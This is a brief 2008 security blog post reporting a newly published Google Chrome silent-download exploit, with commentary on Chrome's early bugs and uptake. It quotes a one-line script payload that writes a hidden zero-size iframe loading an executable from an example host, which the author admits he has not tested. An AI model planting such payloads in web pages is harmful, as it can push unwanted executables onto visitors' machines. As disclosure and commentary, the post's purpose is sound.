Thursday, September 4, 2008

Google Chrome Silent File Download Exploit

| Armando Romeo |

As I said my previous post was destined to be outated very soon.

This is what appeared few minutes ago on milw0rm and packetstorm:


< script > document.write('< iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0" >'); < / script >

This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.

Today Hackers Center stats showed 13% of visitors using the new raw browser.
This is temporary peak, but still scary considering all the bugs found in less than 48 hours.


I think Google will soon regret about this too-soon release

Free Security Magazines